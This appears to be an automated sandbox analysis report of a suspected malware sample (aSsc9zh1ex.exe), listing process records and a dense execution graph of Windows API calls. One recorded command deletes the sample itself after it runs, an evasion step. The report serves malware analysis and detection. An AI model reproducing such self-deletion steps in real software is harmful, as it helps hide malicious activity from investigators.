                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:/c del "C:\Users\user\Desktop\aSsc9zh1ex.exe"
                                                                                                                            Imagebase:0x7ff6c9e20000
                                                                                                                            File size:236544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate

                                                                                                                            General

                                                                                                                            Target ID:16
                                                                                                                            Start time:10:42:34
                                                                                                                            Start date:12/05/2022
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff60bed0000
                                                                                                                            File size:875008 bytes
                                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:16.8%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:16%
                                                                                                                              Total number of Nodes:1586
                                                                                                                              Total number of Limit Nodes:30
                                                                                                                              execution_graph 4982 6f001000 4985 6f00101b 4982->4985 4992 6f0015b6 4985->4992 4987 6f001020 4988 6f001027 GlobalAlloc 4987->4988 4989 6f001024 4987->4989 4988->4989 4990 6f0015dd 3 API calls 4989->4990 4991 6f001019 4990->4991 4994 6f0015bc 4992->4994 4993 6f0015c2 4993->4987 4994->4993 4995 6f0015ce GlobalFree 4994->4995 4995->4987 4053 401941 4054 401943 4053->4054 4059 402da6 4054->4059 4060 402db2 4059->4060 4105 406557 4060->4105 4063 401948 4065 405c26 4063->4065 4147 405ef1 4065->4147 4068 405c65 4074 405d90 4068->4074 4161 40651a lstrcpynW 4068->4161 4069 405c4e DeleteFileW 4075 401951 4069->4075 4071 405c8b 4072 405c91 lstrcatW 4071->4072 4073 405c9e 4071->4073 4077 405ca4 4072->4077 4162 405e35 lstrlenW 4073->4162 4074->4075 4190 406850 FindFirstFileW 4074->4190 4080 405cb4 lstrcatW 4077->4080 4081 405caa 4077->4081 4082 405cbf lstrlenW FindFirstFileW 4080->4082 4081->4080 4081->4082 4084 405d85 4082->4084 4103 405ce1 4082->4103 4083 405dae 4193 405de9 lstrlenW CharPrevW 4083->4193 4084->4074 4087 405d68 FindNextFileW 4091 405d7e FindClose 4087->4091 4087->4103 4088 405bde 5 API calls 4090 405dc0 4088->4090 4092 405dc4 4090->4092 4093 405dda 4090->4093 4091->4084 4092->4075 4096 40557c 24 API calls 4092->4096 4095 40557c 24 API calls 4093->4095 4095->4075 4098 405dd1 4096->4098 4097 405c26 60 API calls 4097->4103 4100 4062da 36 API calls 4098->4100 4099 40557c 24 API calls 4099->4087 4102 405dd8 4100->4102 4102->4075 4103->4087 4103->4097 4103->4099 4166 40651a lstrcpynW 4103->4166 4167 405bde 4103->4167 4175 40557c 4103->4175 4186 4062da MoveFileExW 4103->4186 4109 406564 4105->4109 4106 406787 4107 402dd3 4106->4107 4138 40651a lstrcpynW 4106->4138 4107->4063 4122 4067a1 4107->4122 4109->4106 4110 406755 lstrlenW 4109->4110 4113 406557 10 API calls 4109->4113 4114 40666c GetSystemDirectoryW 4109->4114 4116 40667f GetWindowsDirectoryW 4109->4116 4117 4066f6 lstrcatW 4109->4117 4118 406557 10 API calls 4109->4118 4119 4067a1 5 API calls 4109->4119 4120 4066ae SHGetSpecialFolderLocation 4109->4120 4131 4063e8 4109->4131 4136 406461 wsprintfW 4109->4136 4137 40651a lstrcpynW 4109->4137 4110->4109 4113->4110 4114->4109 4116->4109 4117->4109 4118->4109 4119->4109 4120->4109 4121 4066c6 SHGetPathFromIDListW CoTaskMemFree 4120->4121 4121->4109 4129 4067ae 4122->4129 4123 406824 4124 406829 CharPrevW 4123->4124 4126 40684a 4123->4126 4124->4123 4125 406817 CharNextW 4125->4123 4125->4129 4126->4063 4128 406803 CharNextW 4128->4129 4129->4123 4129->4125 4129->4128 4130 406812 CharNextW 4129->4130 4143 405e16 4129->4143 4130->4125 4139 406387 4131->4139 4134 40644c 4134->4109 4135 40641c RegQueryValueExW RegCloseKey 4135->4134 4136->4109 4137->4109 4138->4107 4140 406396 4139->4140 4141 40639f RegOpenKeyExW 4140->4141 4142 40639a 4140->4142 4141->4142 4142->4134 4142->4135 4144 405e1c 4143->4144 4145 405e32 4144->4145 4146 405e23 CharNextW 4144->4146 4145->4129 4146->4144 4196 40651a lstrcpynW 4147->4196 4149 405f02 4197 405e94 CharNextW CharNextW 4149->4197 4152 405c46 4152->4068 4152->4069 4153 4067a1 5 API calls 4159 405f18 4153->4159 4154 405f49 lstrlenW 4155 405f54 4154->4155 4154->4159 4157 405de9 3 API calls 4155->4157 4156 406850 2 API calls 4156->4159 4158 405f59 GetFileAttributesW 4157->4158 4158->4152 4159->4152 4159->4154 4159->4156 4160 405e35 2 API calls 4159->4160 4160->4154 4161->4071 4163 405e43 4162->4163 4164 405e55 4163->4164 4165 405e49 CharPrevW 4163->4165 4164->4077 4165->4163 4165->4164 4166->4103 4203 405fe5 GetFileAttributesW 4167->4203 4170 405c0b 4170->4103 4171 405c01 DeleteFileW 4173 405c07 4171->4173 4172 405bf9 RemoveDirectoryW 4172->4173 4173->4170 4174 405c17 SetFileAttributesW 4173->4174 4174->4170 4176 405597 4175->4176 4185 405639 4175->4185 4177 4055b3 lstrlenW 4176->4177 4178 406557 17 API calls 4176->4178 4179 4055c1 lstrlenW 4177->4179 4180 4055dc 4177->4180 4178->4177 4181 4055d3 lstrcatW 4179->4181 4179->4185 4182 4055e2 SetWindowTextW 4180->4182 4183 4055ef 4180->4183 4181->4180 4182->4183 4184 4055f5 SendMessageW SendMessageW SendMessageW 4183->4184 4183->4185 4184->4185 4185->4103 4187 4062ee 4186->4187 4189 4062fb 4186->4189 4206 406160 4187->4206 4189->4103 4191 405daa 4190->4191 4192 406866 FindClose 4190->4192 4191->4075 4191->4083 4192->4191 4194 405db4 4193->4194 4195 405e05 lstrcatW 4193->4195 4194->4088 4195->4194 4196->4149 4198 405eb1 4197->4198 4201 405ec3 4197->4201 4199 405ebe CharNextW 4198->4199 4198->4201 4202 405ee7 4199->4202 4200 405e16 CharNextW 4200->4201 4201->4200 4201->4202 4202->4152 4202->4153 4204 405bea 4203->4204 4205 405ff7 SetFileAttributesW 4203->4205 4204->4170 4204->4171 4204->4172 4205->4204 4207 406190 4206->4207 4208 4061b6 GetShortPathNameW 4206->4208 4233 40600a GetFileAttributesW CreateFileW 4207->4233 4210 4062d5 4208->4210 4211 4061cb 4208->4211 4210->4189 4211->4210 4213 4061d3 wsprintfA 4211->4213 4212 40619a CloseHandle GetShortPathNameW 4212->4210 4214 4061ae 4212->4214 4215 406557 17 API calls 4213->4215 4214->4208 4214->4210 4216 4061fb 4215->4216 4234 40600a GetFileAttributesW CreateFileW 4216->4234 4218 406208 4218->4210 4219 406217 GetFileSize GlobalAlloc 4218->4219 4220 406239 4219->4220 4221 4062ce CloseHandle 4219->4221 4235 40608d ReadFile 4220->4235 4221->4210 4226 406258 lstrcpyA 4229 40627a 4226->4229 4227 40626c 4228 405f6f 4 API calls 4227->4228 4228->4229 4230 4062b1 SetFilePointer 4229->4230 4242 4060bc WriteFile 4230->4242 4233->4212 4234->4218 4236 4060ab 4235->4236 4236->4221 4237 405f6f lstrlenA 4236->4237 4238 405fb0 lstrlenA 4237->4238 4239 405fb8 4238->4239 4240 405f89 lstrcmpiA 4238->4240 4239->4226 4239->4227 4240->4239 4241 405fa7 CharNextA 4240->4241 4241->4238 4243 4060da GlobalFree 4242->4243 4243->4221 4244 4015c1 4245 402da6 17 API calls 4244->4245 4246 4015c8 4245->4246 4247 405e94 4 API calls 4246->4247 4257 4015d1 4247->4257 4248 401631 4250 401663 4248->4250 4251 401636 4248->4251 4249 405e16 CharNextW 4249->4257 4253 401423 24 API calls 4250->4253 4271 401423 4251->4271 4260 40165b 4253->4260 4257->4248 4257->4249 4261 401617 GetFileAttributesW 4257->4261 4263 405ae5 4257->4263 4266 405a4b CreateDirectoryW 4257->4266 4275 405ac8 CreateDirectoryW 4257->4275 4259 40164a SetCurrentDirectoryW 4259->4260 4261->4257 4278 4068e7 GetModuleHandleA 4263->4278 4267 405a98 4266->4267 4268 405a9c GetLastError 4266->4268 4267->4257 4268->4267 4269 405aab SetFileSecurityW 4268->4269 4269->4267 4270 405ac1 GetLastError 4269->4270 4270->4267 4272 40557c 24 API calls 4271->4272 4273 401431 4272->4273 4274 40651a lstrcpynW 4273->4274 4274->4259 4276 405ad8 4275->4276 4277 405adc GetLastError 4275->4277 4276->4257 4277->4276 4279 406903 4278->4279 4280 40690d GetProcAddress 4278->4280 4284 406877 GetSystemDirectoryW 4279->4284 4282 405aec 4280->4282 4282->4257 4283 406909 4283->4280 4283->4282 4286 406899 wsprintfW LoadLibraryExW 4284->4286 4286->4283 4996 401c43 4997 402d84 17 API calls 4996->4997 4998 401c4a 4997->4998 4999 402d84 17 API calls 4998->4999 5000 401c57 4999->5000 5001 401c6c 5000->5001 5002 402da6 17 API calls 5000->5002 5003 402da6 17 API calls 5001->5003 5007 401c7c 5001->5007 5002->5001 5003->5007 5004 401cd3 5006 402da6 17 API calls 5004->5006 5005 401c87 5008 402d84 17 API calls 5005->5008 5010 401cd8 5006->5010 5007->5004 5007->5005 5009 401c8c 5008->5009 5011 402d84 17 API calls 5009->5011 5012 402da6 17 API calls 5010->5012 5013 401c98 5011->5013 5014 401ce1 FindWindowExW 5012->5014 5015 401cc3 SendMessageW 5013->5015 5016 401ca5 SendMessageTimeoutW 5013->5016 5017 401d03 5014->5017 5015->5017 5016->5017 5018 4028c4 5019 4028ca 5018->5019 5020 4028d2 FindClose 5019->5020 5021 402c2a 5019->5021 5020->5021 5025 4016cc 5026 402da6 17 API calls 5025->5026 5027 4016d2 GetFullPathNameW 5026->5027 5028 4016ec 5027->5028 5034 40170e 5027->5034 5030 406850 2 API calls 5028->5030 5028->5034 5029 401723 GetShortPathNameW 5031 402c2a 5029->5031 5032 4016fe 5030->5032 5032->5034 5035 40651a lstrcpynW 5032->5035 5034->5029 5034->5031 5035->5034 5036 6f00170d 5037 6f0015b6 GlobalFree 5036->5037 5039 6f001725 5037->5039 5038 6f00176b GlobalFree 5039->5038 5040 6f001740 5039->5040 5041 6f001757 VirtualFree 5039->5041 5040->5038 5041->5038 5042 401e4e GetDC 5043 402d84 17 API calls 5042->5043 5044 401e60 GetDeviceCaps MulDiv ReleaseDC 5043->5044 5045 402d84 17 API calls 5044->5045 5046 401e91 5045->5046 5047 406557 17 API calls 5046->5047 5048 401ece CreateFontIndirectW 5047->5048 5049 402638 5048->5049 5050 402950 5051 402da6 17 API calls 5050->5051 5053 40295c 5051->5053 5052 402972 5055 405fe5 2 API calls 5052->5055 5053->5052 5054 402da6 17 API calls 5053->5054 5054->5052 5056 402978 5055->5056 5078 40600a GetFileAttributesW CreateFileW 5056->5078 5058 402985 5059 402a3b 5058->5059 5060 4029a0 GlobalAlloc 5058->5060 5061 402a23 5058->5061 5062 402a42 DeleteFileW 5059->5062 5063 402a55 5059->5063 5060->5061 5064 4029b9 5060->5064 5065 4032b4 31 API calls 5061->5065 5062->5063 5079 4034c2 SetFilePointer 5064->5079 5067 402a30 CloseHandle 5065->5067 5067->5059 5068 4029bf 5069 4034ac ReadFile 5068->5069 5070 4029c8 GlobalAlloc 5069->5070 5071 4029d8 5070->5071 5072 402a0c 5070->5072 5074 4032b4 31 API calls 5071->5074 5073 4060bc WriteFile 5072->5073 5075 402a18 GlobalFree 5073->5075 5077 4029e5 5074->5077 5075->5061 5076 402a03 GlobalFree 5076->5072 5077->5076 5078->5058 5079->5068 5080 401956 5081 402da6 17 API calls 5080->5081 5082 40195d lstrlenW 5081->5082 5083 402638 5082->5083 4287 4014d7 4292 402d84 4287->4292 4289 4014dd Sleep 4291 402c2a 4289->4291 4293 406557 17 API calls 4292->4293 4294 402d99 4293->4294 4294->4289 4404 4020d8 4405 40219c 4404->4405 4406 4020ea 4404->4406 4409 401423 24 API calls 4405->4409 4407 402da6 17 API calls 4406->4407 4408 4020f1 4407->4408 4410 402da6 17 API calls 4408->4410 4414 4022f6 4409->4414 4411 4020fa 4410->4411 4412 402110 LoadLibraryExW 4411->4412 4413 402102 GetModuleHandleW 4411->4413 4412->4405 4415 402121 4412->4415 4413->4412 4413->4415 4427 406956 4415->4427 4418 402132 4421 402151 4418->4421 4422 40213a 4418->4422 4419 40216b 4420 40557c 24 API calls 4419->4420 4423 402142 4420->4423 4432 6f001817 4421->4432 4424 401423 24 API calls 4422->4424 4423->4414 4425 40218e FreeLibrary 4423->4425 4424->4423 4425->4414 4474 40653c WideCharToMultiByte 4427->4474 4429 406973 4430 40697a GetProcAddress 4429->4430 4431 40212c 4429->4431 4430->4431 4431->4418 4431->4419 4433 6f00184a 4432->4433 4475 6f001bff 4433->4475 4435 6f001851 4436 6f001976 4435->4436 4437 6f001862 4435->4437 4438 6f001869 4435->4438 4436->4423 4525 6f00243e 4437->4525 4509 6f002480 4438->4509 4443 6f0018cd 4447 6f0018d3 4443->4447 4448 6f00191e 4443->4448 4444 6f0018af 4538 6f002655 4444->4538 4445 6f001898 4463 6f00188e 4445->4463 4535 6f002e23 4445->4535 4446 6f00187f 4450 6f001885 4446->4450 4451 6f001890 4446->4451 4557 6f001666 4447->4557 4455 6f002655 10 API calls 4448->4455 4450->4463 4519 6f002b98 4450->4519 4529 6f002810 4451->4529 4464 6f00190f 4455->4464 4456 6f0018b5 4549 6f001654 4456->4549 4461 6f001896 4461->4463 4462 6f002655 10 API calls 4462->4464 4463->4443 4463->4444 4466 6f001965 4464->4466 4563 6f002618 4464->4563 4466->4436 4468 6f00196f GlobalFree 4466->4468 4468->4436 4471 6f001951 4471->4466 4567 6f0015dd wsprintfW 4471->4567 4472 6f00194a FreeLibrary 4472->4471 4474->4429 4570 6f0012bb GlobalAlloc 4475->4570 4477 6f001c26 4571 6f0012bb GlobalAlloc 4477->4571 4479 6f001e6b GlobalFree GlobalFree GlobalFree 4480 6f001e88 4479->4480 4493 6f001ed2 4479->4493 4482 6f00227e 4480->4482 4488 6f001e9d 4480->4488 4480->4493 4481 6f001d26 GlobalAlloc 4499 6f001c31 4481->4499 4483 6f0022a0 GetModuleHandleW 4482->4483 4482->4493 4484 6f0022b1 LoadLibraryW 4483->4484 4485 6f0022c6 4483->4485 4484->4485 4484->4493 4578 6f0016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4485->4578 4486 6f001d71 lstrcpyW 4490 6f001d7b lstrcpyW 4486->4490 4487 6f001d8f GlobalFree 4487->4499 4488->4493 4574 6f0012cc 4488->4574 4490->4499 4491 6f002318 4491->4493 4496 6f002325 lstrlenW 4491->4496 4492 6f002126 4577 6f0012bb GlobalAlloc 4492->4577 4493->4435 4579 6f0016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4496->4579 4497 6f0022d8 4497->4491 4507 6f002302 GetProcAddress 4497->4507 4499->4479 4499->4481 4499->4486 4499->4487 4499->4490 4499->4492 4499->4493 4500 6f002067 GlobalFree 4499->4500 4501 6f0021ae 4499->4501 4502 6f001dcd 4499->4502 4504 6f0012cc 2 API calls 4499->4504 4500->4499 4501->4493 4506 6f002216 lstrcpyW 4501->4506 4502->4499 4572 6f00162f GlobalSize GlobalAlloc 4502->4572 4503 6f00233f 4503->4493 4504->4499 4506->4493 4507->4491 4508 6f00212f 4508->4435 4516 6f002498 4509->4516 4510 6f0012cc GlobalAlloc lstrcpynW 4510->4516 4512 6f0025c1 GlobalFree 4515 6f00186f 4512->4515 4512->4516 4513 6f002540 GlobalAlloc WideCharToMultiByte 4513->4512 4514 6f00256b GlobalAlloc CLSIDFromString 4514->4512 4515->4445 4515->4446 4515->4463 4516->4510 4516->4512 4516->4513 4516->4514 4518 6f00258a 4516->4518 4581 6f00135a 4516->4581 4518->4512 4585 6f0027a4 4518->4585 4521 6f002baa 4519->4521 4520 6f002c4f ReadFile 4524 6f002c6d 4520->4524 4521->4520 4523 6f002d39 4523->4463 4588 6f002b42 4524->4588 4526 6f002453 4525->4526 4527 6f00245e GlobalAlloc 4526->4527 4528 6f001868 4526->4528 4527->4526 4528->4438 4533 6f002840 4529->4533 4530 6f0028db GlobalAlloc 4534 6f0028fe 4530->4534 4531 6f0028ee 4532 6f0028f4 GlobalSize 4531->4532 4531->4534 4532->4534 4533->4530 4533->4531 4534->4461 4537 6f002e2e 4535->4537 4536 6f002e6e GlobalFree 4537->4536 4592 6f0012bb GlobalAlloc 4538->4592 4540 6f0026d8 MultiByteToWideChar 4547 6f00265f 4540->4547 4541 6f0026fa StringFromGUID2 4541->4547 4542 6f00270b lstrcpynW 4542->4547 4543 6f002742 GlobalFree 4543->4547 4544 6f00271e wsprintfW 4544->4547 4545 6f002777 GlobalFree 4545->4456 4546 6f001312 2 API calls 4546->4547 4547->4540 4547->4541 4547->4542 4547->4543 4547->4544 4547->4545 4547->4546 4593 6f001381 4547->4593 4597 6f0012bb GlobalAlloc 4549->4597 4551 6f001659 4552 6f001666 2 API calls 4551->4552 4553 6f001663 4552->4553 4554 6f001312 4553->4554 4555 6f001355 GlobalFree 4554->4555 4556 6f00131b GlobalAlloc lstrcpynW 4554->4556 4555->4464 4556->4555 4558 6f001672 wsprintfW 4557->4558 4560 6f00169f lstrcpyW 4557->4560 4562 6f0016b8 4558->4562 4560->4562 4562->4462 4564 6f001931 4563->4564 4565 6f002626 4563->4565 4564->4471 4564->4472 4565->4564 4566 6f002642 GlobalFree 4565->4566 4566->4565 4568 6f001312 2 API calls 4567->4568 4569 6f0015fe 4568->4569 4569->4466 4570->4477 4571->4499 4573 6f00164d 4572->4573 4573->4502 4580 6f0012bb GlobalAlloc 4574->4580 4576 6f0012db lstrcpynW 4576->4493 4577->4508 4578->4497 4579->4503 4580->4576 4582 6f001361 4581->4582 4583 6f0012cc 2 API calls 4582->4583 4584 6f00137f 4583->4584 4584->4516 4586 6f0027b2 VirtualAlloc 4585->4586 4587 6f002808 4585->4587 4586->4587 4587->4518 4589 6f002b4d 4588->4589 4590 6f002b52 GetLastError 4589->4590 4591 6f002b5d 4589->4591 4590->4591 4591->4523 4592->4547 4594 6f00138a 4593->4594 4595 6f0013ac 4593->4595 4594->4595 4596 6f001390 lstrcpyW 4594->4596 4595->4547 4596->4595 4597->4551 5084 402b59 5085 402bab 5084->5085 5087 402b60 5084->5087 5086 4068e7 5 API calls 5085->5086 5089 402bb2 5086->5089 5088 402ba9 5087->5088 5090 402d84 17 API calls 5087->5090 5091 402da6 17 API calls 5089->5091 5092 402b6e 5090->5092 5093 402bbb 5091->5093 5094 402d84 17 API calls 5092->5094 5093->5088 5095 402bbf IIDFromString 5093->5095 5097 402b7a 5094->5097 5095->5088 5096 402bce 5095->5096 5096->5088 5102 40651a lstrcpynW 5096->5102 5101 406461 wsprintfW 5097->5101 5100 402beb CoTaskMemFree 5100->5088 5101->5088 5102->5100 5103 402a5b 5104 402d84 17 API calls 5103->5104 5105 402a61 5104->5105 5106 402aa4 5105->5106 5107 402a88 5105->5107 5112 40292e 5105->5112 5110 402abe 5106->5110 5111 402aae 5106->5111 5108 402a8d 5107->5108 5109 402a9e 5107->5109 5117 40651a lstrcpynW 5108->5117 5118 406461 wsprintfW 5109->5118 5114 406557 17 API calls 5110->5114 5113 402d84 17 API calls 5111->5113 5113->5112 5114->5112 5117->5112 5118->5112 4924 40175c 4925 402da6 17 API calls 4924->4925 4926 401763 4925->4926 4927 406039 2 API calls 4926->4927 4928 40176a 4927->4928 4929 406039 2 API calls 4928->4929 4929->4928 5119 401d5d 5120 402d84 17 API calls 5119->5120 5121 401d6e SetWindowLongW 5120->5121 5122 402c2a 5121->5122 4930 401ede 4931 402d84 17 API calls 4930->4931 4932 401ee4 4931->4932 4933 402d84 17 API calls 4932->4933 4934 401ef0 4933->4934 4935 401f07 EnableWindow 4934->4935 4936 401efc ShowWindow 4934->4936 4937 402c2a 4935->4937 4936->4937 5123 4028de 5124 4028e6 5123->5124 5125 4028ea FindNextFileW 5124->5125 5127 4028fc 5124->5127 5126 402943 5125->5126 5125->5127 5129 40651a lstrcpynW 5126->5129 5129->5127 5130 404ee3 GetDlgItem GetDlgItem 5131 404f35 7 API calls 5130->5131 5137 40515a 5130->5137 5132 404fdc DeleteObject 5131->5132 5133 404fcf SendMessageW 5131->5133 5134 404fe5 5132->5134 5133->5132 5136 40501c 5134->5136 5138 406557 17 API calls 5134->5138 5135 40523c 5140 4052e8 5135->5140 5149 405295 SendMessageW 5135->5149 5173 40514d 5135->5173 5139 404476 18 API calls 5136->5139 5137->5135 5162 4051c9 5137->5162 5184 404e31 SendMessageW 5137->5184 5143 404ffe SendMessageW SendMessageW 5138->5143 5144 405030 5139->5144 5141 4052f2 SendMessageW 5140->5141 5142 4052fa 5140->5142 5141->5142 5151 405313 5142->5151 5152 40530c ImageList_Destroy 5142->5152 5165 405323 5142->5165 5143->5134 5148 404476 18 API calls 5144->5148 5145 40522e SendMessageW 5145->5135 5146 4044dd 8 API calls 5150 4054e9 5146->5150 5164 405041 5148->5164 5154 4052aa SendMessageW 5149->5154 5149->5173 5155 40531c GlobalFree 5151->5155 5151->5165 5152->5151 5153 40549d 5158 4054af ShowWindow GetDlgItem ShowWindow 5153->5158 5153->5173 5157 4052bd 5154->5157 5155->5165 5156 40511c GetWindowLongW SetWindowLongW 5159 405135 5156->5159 5166 4052ce SendMessageW 5157->5166 5158->5173 5160 405152 5159->5160 5161 40513a ShowWindow 5159->5161 5183 4044ab SendMessageW 5160->5183 5182 4044ab SendMessageW 5161->5182 5162->5135 5162->5145 5163 405094 SendMessageW 5163->5164 5164->5156 5164->5163 5167 405117 5164->5167 5170 4050d2 SendMessageW 5164->5170 5171 4050e6 SendMessageW 5164->5171 5165->5153 5177 40535e 5165->5177 5189 404eb1 5165->5189 5166->5140 5167->5156 5167->5159 5170->5164 5171->5164 5173->5146 5174 405468 5175 405473 InvalidateRect 5174->5175 5178 40547f 5174->5178 5175->5178 5176 40538c SendMessageW 5181 4053a2 5176->5181 5177->5176 5177->5181 5178->5153 5198 404dec 5178->5198 5180 405416 SendMessageW SendMessageW 5180->5181 5181->5174 5181->5180 5182->5173 5183->5137 5185 404e90 SendMessageW 5184->5185 5186 404e54 GetMessagePos ScreenToClient SendMessageW 5184->5186 5187 404e88 5185->5187 5186->5187 5188 404e8d 5186->5188 5187->5162 5188->5185 5201 40651a lstrcpynW 5189->5201 5191 404ec4 5202 406461 wsprintfW 5191->5202 5193 404ece 5194 40140b 2 API calls 5193->5194 5195 404ed7 5194->5195 5203 40651a lstrcpynW 5195->5203 5197 404ede 5197->5177 5204 404d23 5198->5204 5200 404e01 5200->5153 5201->5191 5202->5193 5203->5197 5207 404d3c 5204->5207 5205 406557 17 API calls 5206 404da0 5205->5206 5208 406557 17 API calls 5206->5208 5207->5205 5209 404dab 5208->5209 5210 406557 17 API calls 5209->5210 5211 404dc1 lstrlenW wsprintfW SetDlgItemTextW 5210->5211 5211->5200 5212 401563 5213 402ba4 5212->5213 5216 406461 wsprintfW 5213->5216 5215 402ba9 5216->5215 5217 4045e6 lstrlenW 5218 404605 5217->5218 5219 404607 WideCharToMultiByte 5217->5219 5218->5219 5220 404967 5221 404993 5220->5221 5222 4049a4 5220->5222 5281 405b5e GetDlgItemTextW 5221->5281 5224 4049b0 GetDlgItem 5222->5224 5230 404a0f 5222->5230 5226 4049c4 5224->5226 5225 40499e 5228 4067a1 5 API calls 5225->5228 5231 4049d8 SetWindowTextW 5226->5231 5236 405e94 4 API calls 5226->5236 5227 404af3 5279 404ca2 5227->5279 5283 405b5e GetDlgItemTextW 5227->5283 5228->5222 5230->5227 5233 406557 17 API calls 5230->5233 5230->5279 5234 404476 18 API calls 5231->5234 5232 404b23 5237 405ef1 18 API calls 5232->5237 5238 404a83 SHBrowseForFolderW 5233->5238 5239 4049f4 5234->5239 5235 4044dd 8 API calls 5240 404cb6 5235->5240 5241 4049ce 5236->5241 5242 404b29 5237->5242 5238->5227 5243 404a9b CoTaskMemFree 5238->5243 5244 404476 18 API calls 5239->5244 5241->5231 5245 405de9 3 API calls 5241->5245 5284 40651a lstrcpynW 5242->5284 5246 405de9 3 API calls 5243->5246 5247 404a02 5244->5247 5245->5231 5248 404aa8 5246->5248 5282 4044ab SendMessageW 5247->5282 5251 404adf SetDlgItemTextW 5248->5251 5256 406557 17 API calls 5248->5256 5251->5227 5252 404a08 5254 4068e7 5 API calls 5252->5254 5253 404b40 5255 4068e7 5 API calls 5253->5255 5254->5230 5263 404b47 5255->5263 5257 404ac7 lstrcmpiW 5256->5257 5257->5251 5260 404ad8 lstrcatW 5257->5260 5258 404b88 5285 40651a lstrcpynW 5258->5285 5260->5251 5261 404b8f 5262 405e94 4 API calls 5261->5262 5264 404b95 GetDiskFreeSpaceW 5262->5264 5263->5258 5266 405e35 2 API calls 5263->5266 5268 404be0 5263->5268 5267 404bb9 MulDiv 5264->5267 5264->5268 5266->5263 5267->5268 5269 404c51 5268->5269 5270 404dec 20 API calls 5268->5270 5271 404c74 5269->5271 5272 40140b 2 API calls 5269->5272 5273 404c3e 5270->5273 5286 404498 KiUserCallbackDispatcher 5271->5286 5272->5271 5275 404c53 SetDlgItemTextW 5273->5275 5276 404c43 5273->5276 5275->5269 5278 404d23 20 API calls 5276->5278 5277 404c90 5277->5279 5287 4048c0 5277->5287 5278->5269 5279->5235 5281->5225 5282->5252 5283->5232 5284->5253 5285->5261 5286->5277 5288 4048d3 SendMessageW 5287->5288 5289 4048ce 5287->5289 5288->5279 5289->5288 5290 401968 5291 402d84 17 API calls 5290->5291 5292 40196f 5291->5292 5293 402d84 17 API calls 5292->5293 5294 40197c 5293->5294 5295 402da6 17 API calls 5294->5295 5296 401993 lstrlenW 5295->5296 5297 4019a4 5296->5297 5300 4019e5 5297->5300 5302 40651a lstrcpynW 5297->5302 5299 4019d5 5299->5300 5301 4019da lstrlenW 5299->5301 5301->5300 5302->5299 5303 40166a 5304 402da6 17 API calls 5303->5304 5305 401670 5304->5305 5306 406850 2 API calls 5305->5306 5307 401676 5306->5307 5308 402aeb 5309 402d84 17 API calls 5308->5309 5310 402af1 5309->5310 5311 406557 17 API calls 5310->5311 5312 40292e 5310->5312 5311->5312 5313 4026ec 5314 402d84 17 API calls 5313->5314 5321 4026fb 5314->5321 5315 402745 ReadFile 5315->5321 5325 402838 5315->5325 5316 40608d ReadFile 5316->5321 5318 402785 MultiByteToWideChar 5318->5321 5319 40283a 5335 406461 wsprintfW 5319->5335 5321->5315 5321->5316 5321->5318 5321->5319 5322 4027ab SetFilePointer MultiByteToWideChar 5321->5322 5323 40284b 5321->5323 5321->5325 5326 4060eb SetFilePointer 5321->5326 5322->5321 5324 40286c SetFilePointer 5323->5324 5323->5325 5324->5325 5327 406107 5326->5327 5334 40611f 5326->5334 5328 40608d ReadFile 5327->5328 5329 406113 5328->5329 5330 406150 SetFilePointer 5329->5330 5331 406128 SetFilePointer 5329->5331 5329->5334 5330->5334 5331->5330 5332 406133 5331->5332 5333 4060bc WriteFile 5332->5333 5333->5334 5334->5321 5335->5325 4938 40176f 4939 402da6 17 API calls 4938->4939 4940 401776 4939->4940 4941 401796 4940->4941 4942 40179e 4940->4942 4977 40651a lstrcpynW 4941->4977 4978 40651a lstrcpynW 4942->4978 4945 4017a9 4947 405de9 3 API calls 4945->4947 4946 40179c 4949 4067a1 5 API calls 4946->4949 4948 4017af lstrcatW 4947->4948 4948->4946 4951 4017bb 4949->4951 4950 406850 2 API calls 4950->4951 4951->4950 4952 405fe5 2 API calls 4951->4952 4954 4017cd CompareFileTime 4951->4954 4955 40188d 4951->4955 4962 406557 17 API calls 4951->4962 4966 40651a lstrcpynW 4951->4966 4973 405b7a MessageBoxIndirectW 4951->4973 4975 401864 4951->4975 4976 40600a GetFileAttributesW CreateFileW 4951->4976 4952->4951 4954->4951 4956 40557c 24 API calls 4955->4956 4958 401897 4956->4958 4957 40557c 24 API calls 4964 401879 4957->4964 4959 4032b4 31 API calls 4958->4959 4960 4018aa 4959->4960 4961 4018be SetFileTime 4960->4961 4963 4018d0 CloseHandle 4960->4963 4961->4963 4962->4951 4963->4964 4965 4018e1 4963->4965 4967 4018e6 4965->4967 4968 4018f9 4965->4968 4966->4951 4970 406557 17 API calls 4967->4970 4969 406557 17 API calls 4968->4969 4972 401901 4969->4972 4971 4018ee lstrcatW 4970->4971 4971->4972 4972->4964 4974 405b7a MessageBoxIndirectW 4972->4974 4973->4951 4974->4964 4975->4957 4975->4964 4976->4951 4977->4946 4978->4945 5336 4054f0 5337 405500 5336->5337 5338 405514 5336->5338 5339 405506 5337->5339 5348 40555d 5337->5348 5340 405533 5338->5340 5341 40551c IsWindowVisible 5338->5341 5343 4044c2 SendMessageW 5339->5343 5342 405562 CallWindowProcW 5340->5342 5347 404eb1 4 API calls 5340->5347 5344 405529 5341->5344 5341->5348 5345 405510 5342->5345 5343->5345 5346 404e31 5 API calls 5344->5346 5346->5340 5347->5348 5348->5342 5349 401a72 5350 402d84 17 API calls 5349->5350 5351 401a7b 5350->5351 5352 402d84 17 API calls 5351->5352 5353 401a20 5352->5353 5354 401573 5355 401583 ShowWindow 5354->5355 5356 40158c 5354->5356 5355->5356 5357 402c2a 5356->5357 5358 